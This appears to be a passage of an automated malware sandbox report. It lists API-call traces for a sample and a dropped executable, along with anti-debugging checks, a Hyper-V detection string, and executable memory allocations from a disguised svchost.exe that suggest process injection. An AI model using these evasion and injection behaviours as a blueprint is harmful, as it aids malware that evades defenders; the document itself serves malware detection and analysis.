Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01309910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,22_2_01309910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0130DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,22_2_0130DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0130DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,22_2_0130DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,22_2_012E7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015B9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,25_2_015B9910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,25_2_015AD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,25_2_015BDA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,25_2_015BDAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01597680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,25_2_01597680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,25_2_015AE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,27_2_00AFD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B09910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,27_2_00B09910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,27_2_00B0DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,27_2_00B0DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,27_2_00AFE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,27_2_00AE7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,29_2_012BD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012C9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,29_2_012C9910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,29_2_012CDA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,29_2_012CDAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,29_2_012BE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A7680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,29_2_012A7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01139910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,31_2_01139910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,31_2_0112D120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,31_2_0113DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,31_2_0113DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01117680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,31_2_01117680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,31_2_0112E6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,33_2_0130D120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01319910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,33_2_01319910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,33_2_0131DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,33_2_0131DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,33_2_0130E6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,33_2_012F7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120
Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477
Source: svchost.exe, 00000002.00000003.1341912346.00000000008A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401B20 rdtsc 1_2_00401B20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,22_2_012F79D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,22_2_012F78A0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,1_2_004020E0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00406800 mov eax, dword ptr fs:[00000030h]1_2_00406800
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00406B60 mov eax, dword ptr fs:[00000030h]1_2_00406B60
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00406B60 mov edx, dword ptr fs:[00000030h]1_2_00406B60
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01281360 mov eax, dword ptr fs:[00000030h]22_2_01281360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01281360 mov edx, dword ptr fs:[00000030h]22_2_01281360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01281000 mov eax, dword ptr fs:[00000030h]22_2_01281000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01531360 mov eax, dword ptr fs:[00000030h]25_2_01531360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01531360 mov edx, dword ptr fs:[00000030h]25_2_01531360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01531000 mov eax, dword ptr fs:[00000030h]25_2_01531000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A41360 mov eax, dword ptr fs:[00000030h]27_2_00A41360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A41360 mov edx, dword ptr fs:[00000030h]27_2_00A41360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00A41000 mov eax, dword ptr fs:[00000030h]27_2_00A41000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01201360 mov eax, dword ptr fs:[00000030h]29_2_01201360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01201360 mov edx, dword ptr fs:[00000030h]29_2_01201360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_01201000 mov eax, dword ptr fs:[00000030h]29_2_01201000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B1360 mov eax, dword ptr fs:[00000030h]31_2_010B1360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B1360 mov edx, dword ptr fs:[00000030h]31_2_010B1360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B1000 mov eax, dword ptr fs:[00000030h]31_2_010B1000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01291360 mov eax, dword ptr fs:[00000030h]33_2_01291360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01291360 mov edx, dword ptr fs:[00000030h]33_2_01291360
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01291000 mov eax, dword ptr fs:[00000030h]33_2_01291000
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,1_2_00401150

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E50000 protect: page execute and read and write
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 790000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 15A0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: F60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: CD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1250000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: B60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: EC0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1020000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: E60000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: 1340000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FD0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: D00000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FE0000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: A90000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe base: FF0000 protect: page execute and read and writeJump to behavior
